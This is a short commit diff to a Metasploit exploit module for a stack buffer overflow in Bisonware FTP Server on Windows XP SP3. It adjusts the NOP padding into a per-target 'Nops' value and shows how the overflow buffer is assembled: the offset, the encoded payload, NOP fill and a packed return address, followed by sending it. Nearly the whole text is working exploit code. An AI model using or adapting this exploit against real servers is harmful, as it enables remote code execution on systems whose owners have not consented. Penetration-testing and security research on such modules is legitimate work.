parent
e3bca890c1
commit
441fff4b7c
|
@ -48,7 +48,8 @@ class Metasploit4 < Msf::Exploit::Remote
|
||||||
[ 'Bisonware FTP Server / Windows XP SP3 EN',
|
[ 'Bisonware FTP Server / Windows XP SP3 EN',
|
||||||
{
|
{
|
||||||
'Ret' => 0x0040333f,
|
'Ret' => 0x0040333f,
|
||||||
'Offset' => 1028
|
'Offset' => 1028,
|
||||||
|
'Nops' => 404
|
||||||
}
|
}
|
||||||
],
|
],
|
||||||
],
|
],
|
||||||
|
@ -77,9 +78,8 @@ class Metasploit4 < Msf::Exploit::Remote
|
||||||
connect #connect for the second time
|
connect #connect for the second time
|
||||||
|
|
||||||
buf = rand_text_alpha(target['Offset'])
|
buf = rand_text_alpha(target['Offset'])
|
||||||
buf << make_nops(16)
|
|
||||||
buf << payload.encoded
|
buf << payload.encoded
|
||||||
buf << make_nops(388 - payload.encoded.length)
|
buf << make_nops( (target['Nops']) - payload.encoded.length)
|
||||||
buf << [target.ret].pack('V')
|
buf << [target.ret].pack('V')
|
||||||
print_status('Sending payload...')
|
print_status('Sending payload...')
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue